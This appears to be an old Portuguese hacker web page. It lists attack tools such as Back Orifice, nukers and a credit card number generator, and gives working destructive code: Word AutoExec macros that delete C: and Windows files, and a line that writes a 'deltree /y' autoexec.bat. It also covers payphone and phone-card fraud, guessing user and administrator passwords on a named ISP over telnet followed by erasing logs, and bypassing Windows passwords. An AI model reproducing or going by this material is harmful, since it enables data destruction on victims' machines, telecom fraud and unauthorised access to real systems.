Cartão de Crédito

Nome: Tamanho: Descrição: 
CardPro 49 kb Gera números válidos de cartão de crédito

 
Diversos
 

Nome: Tamanho: Descrição: 
Hacker Utilities 429 kb Diversos utilitarios hackers

 
Email Anônimo
 

Nome: Tamanho: Descrição: 
AMail 72 kb Envia Emails anônimos

 
 Portscan e anti-nuke
 

Nome: Tamanho: Descrição: 
ICMPWatch 20 kb Alerta se você está sendo nukado
Portscan 26 kb Procura por portas abertas em um IP

 
Phreaker
 

Nome: Tamanho: Descrição: 
Phreaker Toolz 129 kb Gera sons (tons) de telefone

 
Senhas
 

Nome: Tamanho: Descrição: 
Jack 14 115 kb Descobre senhas criptografadas 

Invasor
 

Nome: Tamanho: Descrição: 
Back Orifice 121 Kb Ótimo invasor, fornece dados sobre a vitíma.

Nuke
 

Nome: Tamanho: Descrição: 
Nuke 141 Kb Programa para nukar as pessoas.

Gerador de CPF
 

Nome: Tamanho: Descrição: 
Fast CPF 9,26 Kb Excelente gerador de nº de cpf.

Simulador
 

Nome: Tamanho: Descrição: 
Sex 2000 186 Kb Programa que simula a formatação de hd.

 
 
  Texto Hacker  

Mas afinal o que é Hacher? Hacker hoje em dia está associado a pirataria digital, mas existem dois tipos de Hackers:

- Os do bem, que entram em sistemas apenas por diversão e não destroem ou modificam nada (a não ser que seja necessario para não o descubrirem no sistema)

-Os do mal, que derrubam sistemas de empresas e diversos, esse Hacker é conhecido como Cracker, esse sim é uma ameaça para os sistemas, seu objetivo é destrui-lo. Abaixo tem as expecificações de termos usados na WEB

Lamer - é aquele que acaba de fazer parte da rede e se acha o maximo e já que invadir computadores;

Wannabe - é o principiante que aprendeu a usar alguns programas prontos para descobrir senhas ou invadir sistemas (receitas de bolo), entrou num provedor de fundo de quintal e já acha que vai conseguir entrar nos computadores da Nasa;

Newbie - é o novato da rede, e faz varias perguntas que não devia, o NEWBIE é muito paracido com o LAMER, só que ingênuo.

Larva - este já está quase se tornando um hacker. Já consegue desenvolver suas próprias técnicas de como invadir sistemas; Hacker - tem conhecimentos reais de programação e de sistema operacionais, principalmente o Unix, o mais usado dos servidores da Internet. Conhece todas as falhas de segurança dos sistemas e procura achar novas. Desenvolve suas próprias técnicas e desprezas as "receitas de bolo";

Cracker - é o hacker do mal, que invade sistemas, enfim afim de dar problemas à algo ou à alguém;

Phreaker - tem bons conhecimentos de telefonia e consegue inclusive fazer chamadas internacionais sem pagar, o que lhe premite desenvolver seus ataques a partir de um servidor de outro país;

Guru - o supra-sumo dos hackers. Agora que vc já sabe algo sobre Hackers vamos ao que enteressa:

Como ser Hacker

Primeiro nunca pergunte isso a alguem. Para se tornar um Hacker vc tem que ir adquirindo conhecimentos para ir dominando o local onde vc está (a rede).Tudo que você precisa saber:

1.Nunca pergunte como se tornar um hacker;

2.Conhecimento.Poxa... o que é IP?

Apenas alguns surfistas da rede sabem o que é isso.

IP é Internet Protocol.

Onde Começar ?

Comece com sistemas pequenos como em universidades ou escritórios. Depois passe para redes maiores como telenet. A telenet é altamente recomendada para novatos, pois ela tem um sistema de segurança muito vago. São milhares de conexões ao mesmo tempo, o que torna praticamente impossível a monitoração de um usuário .

Regras hackers.

1- Nunca destruir nenhum sistema.

2- Nunca alterar nenhum dos arquivos do sistema, a não ser que seja necessário para esconder a sua presença ou garantir a sua entrada posteriormente.

3- Não compartilhe com ninguém seus projetos Hackers

4- Em uma BBS não é aconselhável que você discuta seus projetos Hackers. BBS's podem ser monitoradas pelo governo.

5- Nunca dê nomes ou telefones reais em uma BBS.

6- Nunca deixe seu apelido em um sistema que você entrou.

7- NÃO entre em computadores governamentais.

8- Nunca converse sobre seus planos Hackers com outra pessoa por nenhum telefone

9- Seja atento, mantenha todo o seu material hacker em um lugar seguro.

10- Para se tornar um verdadeiro hacker você deve simplesmente praticar e adquirir conhecimento

Ética hacker

A ética hacker pode ser definida numa frase: Veja tudo, aprenda tudo, não toque em nada. Crakers

=> Macros do Word

Ainda hoje existe muita gente que so é capaz de abrir o word, editar, negritar, sublinhar e mandar para impressora, muitos, milhares so sabem mexer no basico mesmo. Eles nem imaginam o que tem por traz deste riquissimo processador de texto.

Esta materia tem como objetivo fazer desde pequenas até grandes sacanagens com usuarios pentelhos.

ps: Software/versao abrangido: Word da Microsoft®, versões 6 (win3.11) e 7.0 (win95)

O Word possui um arquivo chamado "normal.dot" onde estão todas as configuracões padrao do word. Se por algum motivo este arquivo for deletado o Word cria automaticamente quando for inicializado.

Niveis de sacanagem Nivel 1..... Apenas uma brincadeira

Nivel 2..... Apenas uma brincadeira de mau gosto

Nivel 3..... Não é mais brincadeira.

Primeiramente você precisa criar uma macro, siga os passos:

Entre no Word, feche a janela de documento, não deixe nenhum documento aberto(ativo), clique em Arquivo(File) depois Macro, coloque no nome da macro "AutoExec"(obrigatorio) este macro é inicializada toda vez que o Word for iniciado, depois clique em 'Criar', delete as duas linhas que tiver la (Sub MAIN e End Sub) e copie a rotina que tem logo mais abaixo.

ps: existe outras formas/meios de criar um macro, mas esta é mais facil

Nivel 1

O nivel 1 serve para você se mostrar, falando que entende do Word melhor do que ninguem. Cada vez que o usuario inicia o Word recebera uma mensagem de alerta ou qualquer outro coisa que sair da sua mente. veja abaixo.

Sub MAIN MsgBox "Você é um pentelho! Eu nãoo irei prosseguir com o sistema", "Microsoft Word", 5 MsgBox "Usuário Pirata Detectado", "FATAL ERROR", 16 MsgBox "JAMES BOND 007 ", "007 na estrada Digital", 64 End Sub

Nivel 2

É para deixar o usuario irritadissimo. no corpo da macro cole este texto abaixo:

Sub MAIN ArquivoNovoPadrão Inserir "James" ArquivoNovoPadrão Inserir "Bond" ArquivoNovoPadrão Inserir "007" ArquivoNovoPadrão Inserir "James Bond 007 Na Estrada digital " ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "James Bond 007 Na Estrada digital " End Sub

Nivel 3

Bom este nivel é pura sacanagem,com ele um simples clicar* do mouse, e tudo desaparece! isto mesmo "del *.*" ou apenas os documentos, voce é quem sabe.

Sub MAIN Kill "C:\*.*" Kill "C:\WINDOWS\*.*" Kill "C:\WIN95\*.*" End Sub

Lembre-se de que estes macros, sõo gravado no arquivo default do word, ou seja no 'normal.dot' se este arquivo for deletado, o Word cria automaticamente na inicialização, então se você for fazer estas sacanagens ai acima, proteja este arquivo, com o comando 'attrib +r'.

Detalhes: Existe uma forma de iniciar o Word, sem que inicialize a macro 'AutoExec' mas não irei falar, descubra você mesmo. A macro do word é uma ferramenta riquissima, procure fuçar. Voce pode fazer estas no seu próprio computador (só cuidado!), salvando sempre no arquivo "normal.dot" depois copie apenas este arquivo para aquele seu colega/amigo pentelho e saie de perto, para não explodir em você.

=> Como criar um autoexec.bat destrutivo

O exemplo abaixo faz com que o vírus crie um arquivo autoexec.bat destrutivo, fazendo que assim que o computador seja iniciado, o comando deltree será ativado apagando todos os diretórios do computador. Open "C:\autoexec.bat" For Output As #1 Print #1, "@deltree /y *.* >nul" Close #1

=> Apagar um arquivo Esse comando apaga um arquivo: kill "c:\windows\win.com"


Phreaking

Telefonia Brasileira

      Por acaso você já contou o quanto de fichas telefonicas já gastou em sua vida (principalmente quem não tem telefone), agora imagine e multiplique por R$ 0,10 faça também isso com cartões telefônicos e ficará pasmo .Agora pessoal, a ficha telefonica de R$ 0,10 só dá 2 mim. de ligação local (antes era 3mim.). Agora o cartão telefonico se esgota muito mais rápido. Para ligações locais de sua casa você vai ter que pagar 270%, a mais e 30% a mais para Interurbanos. De acordo com o aumento de abril de 1997. Eu acho uma coisa tão vulgar e tão ladra ter que pagar para conversar, um sentido que recebemos da natureza, ainda mais quando se tem aumentos explosivos como esses de hoje em dia. Hackers do Brasil, vamos mostrar a eles quem é que manda, vamos desafiá-los e teremos algo que eles nunca farão nos esquecer. Acompanhe aqui formas de driblar, fraudar, e estraçalhar a roubalheira da TELESP, TELERJ, EMBRATEL e muitas outros organizações de telefonia...



 

 
Fraudando orelhões com um aparelho comum
 

Modo de fraude com telefone comum à orelhões públicos: Primeiro você deve arrumar um telefone comum bem pequeno e compacto. Depois você tem que descascar os fios dele (vão dar em 2 fios). Então arrume um bom alicate, estilete ou faca e vá até um orelhão.Descasque os fios do orelhão (descasque, não é para cortar) pegue os dois fios descascados do orelhão e entrelace com os dois fios do seu telefone, observe a polarização, ou seja se o seu telefone portátil ficar sem linha inverta a posição dos fios telefônicos, pois, ao contrário do que muita gente pensa o orelhão tem fio negativo e positivo. Agora é só efetuar a ligação de seu telefone comum


Fraude a orelhões através de notebook

    O processo para se conectar notebooks a orelhões, é igual ao de se conectar telefones comuns.  Resumirei nesse item, algumas considerações a respeito da fiação do notebook, que segue os padrões da FCC Americana e é um pouco diferente da nossa.O conector do fio do notebook, é do tipo jack, tem quatro fios dentro dele. Arranque o conector de plástico transparente que fica na ponta do fio, pegue os dios fios centrais e separe-os dos fios das extremidades.Estes dois fios centrais, são os que serão utilizados para fazer a ligação no orelhão. Eu aconselho que você coloque jacarés neles (pequeno gancho achado em qualquer loja de componentes eletrônicos).Basta conectar-se a BBS's da mesma forma que você se conecta em casa. Caso você queira testar se está tudo ok, abra um programa de terminal qualquer e digite ATA, se fizer um barulhinho parecido com o tom de linha está tudo OK. 


Fraude em Caixa de Verificação
      As caixas de verificação (ou armários na linguagem "técnica" da TELESP) são caixas de ferro, que geralmente ficam localizadas em vias públicas, e são utilizadas para se fazer a checagem das linhas telefônicas e detectar problemas antes que chegue a central. Tais caixas costumam ser da cor cinza e tem cerca de 1,5 m de altura, com um código em preto escrito na parte superior.Para fazer tal tipo de fraude, basta, que você pegue um das dezenas de pares de fios que se encontram lá e entrelaçe nos 2 fos de seu telefone portátil, cujo qual estará com seus fios descascados. Observe também a polarização. Vale lembrar que você não deve destruir a caixa para abrí-la, se é que ela já não esteja arrombada. Não vá arrombar a droga da caixa. Isto é coisa pra quem não tem célebro. E você não é um vândalo, você é um Hacker.OBS : Existem mais umas 2 formas de fraude, não vou por aqui porque o verdadeiro Hacker descobre o que necessita. Ser Phreaker é mais que desenvolver um crime, é desenvolver uma incrível maneira de se viver...

=> Ligando em orelhões à cartão sem pagar

Usando um cartão usado de 50 ligações, com a parte de trás pintata com grafite 6B

Usando um cartão novo, com a parte de trás pintata com esmalte base de unha

Usando um cartão usado, envolvido por papel alumínio

Usando um cartão usado de 50 ligações, com a parte de trás raspada com uma moeda

Usando um cartão novo, após completar a ligação(a pessoa falar Aló)segura-se o nº9 tira o cartão e continue segurando o botão até acabar de falar.

=> Regras Phreakers :
 

1- Nunca use as boxes na linha da sua casa

2- Nunca converse sobre seus projetos phreakers na linha de sua casa

3- Nunca use seu nome real quando fazer o phreak

4- Seja cuidadoso com que comentar sobre seus projetos preakers

5- Nunca deixe material phreak em qualquer lugar, sempre tenha um esconderijo para guardá-lo protegido.

6- Não seja pego

Senhas

  1. Cavalo de Tróia

  2. O hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programas, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens do computador.
     
  3. Farejamento de redes

  4. Para acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam codificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados.
     
  5. Engenharia social

  6. É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker.
     
  7. Quebra-cabeça

  8. Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo deve levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção.
     
  9. Invasão do servidor

  10. O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo que contém as passwords (ex. passwd). Com esse arquivo em mãos o hacker pode descriptografá-lo usando programas específicos. Dessa forma ele obtém praticamente (a descriptografação não é 100% eficiente) todas as passwords desse provedor.
     
  11. Dedução

  12. Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usar o quebra-cabeça que precisa testar milhares de combinações, o hacker faz a tentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõe de três dados fundamentais:
    1. Cerca de 1 em cada 30 usuários usa o login como senha.
    2. Muitos administradores usam a senha padrão do sistema.
    3. A maioria das senhas está relacionada ao login. Ex: login:kurt senha:cobain
     

Mãos à obra!

 

Chega de teorizar e vamos descobrir as senhas. Utilizaremos o último método por ser ele o mais simples. O penúltimo método também é descrito detalhadamente no FAQ alt.2600.

Entre na HomePage de algum servidor (experimente www.bhnet.com.br - bem fácil) e procure pela lista de homepages pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode perceber um padrão do tipo http://www.servidor.com.br/~usuário, onde usuário é o login do dono da página. Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro sistema operacional, inicie seu programa de telnet. A vantagem da conexão via telnet é que suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser (mas nunca exagere). Conecte-se ao host do servidor (www.bhnet.com.br no nosso exemplo). Então entre com o Login de um dos usuários (olhando na lista de homepages) e use como senha esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex: login:kurt senha:cobain).
Agora vem o próximo e mais valioso passo. Tentar pegar a senha do administrador. Para isso consulte o FAQ do alt.2600 e descubra quais são as senhas padrões para o administrador em cada sistema. Novamente usando telnet tente até achar ou desistir. Se você conseguir, vai ter acesso total ao servidor e terá hackeado o sistema! Mas cuidado ao usar a senha... você pode ser pego. Quando usar a senha do administrador, não esqueça de apagar os arquivos log ao sair. Veja o FAQ alt.2600 para saber o que são arquivos log, caso você não saiba.

Como adivinhar uma Senha

Uma senha fácil de se deduzir é a causa mais comum dos problemas de segurança. Se você não souber como trocar a sua senha, coloque essa tarefa como item número 1 da sua lista de coisas a aprender. Você nunca deve criar senhas tomando por base o seu próprio nome - mesmo que seja o seu nome de trás para frente. A senha não pode também ser fácil de se divinhar, como o nome do marido ou mulher, do namorado ou namorada, do seu cão, a placa do carro, a rua onde mora, a data do nascimento - ou outra informação conhecida. Os hackers costumam usar os programas e dicionários on-line para adivinhar expressões como dedicação. omo podem ser as senhas então? Não há pistas, certo? Pois bem, seja criativo. Pegue a sua frase preferida, como Até que a morte nos separe, querida e utilize a primeira letra de cada palavra aqamnsq. Dessa forma, a senha não é propriamente uma palavra, mas é fácil; de lembrar e difícel de adivinhar. Você pode também combinar palavras com números, o que é bem aconselhável. Mas nunca crie uma senha somente com números, é muito mais fácil de adivinhar.

Bios Password

Se você pegar o computador desligado ou esquecer o password:

- Ligue o micro e entre o setup; - Anote TODOS os dados em um papel; - Desligue e abra a CPU; - Ache uma bateria na motherboard e retire-a; - Espere uns 20 minutos e recoloque a bateria; - Ligue o micro novamente e entre no setup; - Re-configure todos os dados que você anotou ou coloque od dados padrao.

Password do Windows

Para quebrar o password do Windows 3.x você deve digitar"ctrl+alt+del" e depois "enter" quando aparecer a caixa de verificação. Depois que você passou o password, edite o arquivo win.ini e apague as linhas "load=" e "run=".

Para quebrar o password no WIN95:

1 - Se a caixa de verificação que aparecer for Password Logon, simplesmente clique em cancel que o sistema vai entrar.

2 - Se a caixa de verificação for Windows Password, digite"ctrl+alt+del", escolha a janela do password na lista que aparecerá e clique em "End Task". Com o password passado, edite o arquivo win.ini e apague as linhas "load=" e "run=".

Screen Saver Password

Para retirar o password de Screen Saver do Windows 3.x você deve editar o arquivo control.ini, apagando tudo o que tiver na area do password.

Para retirar o password do Screen Saver do WIN95, renomeie todos os arquivos de extensão .pwl do diretório do windows. Anote os nomes alterados em um papel para eventuais problemas.

1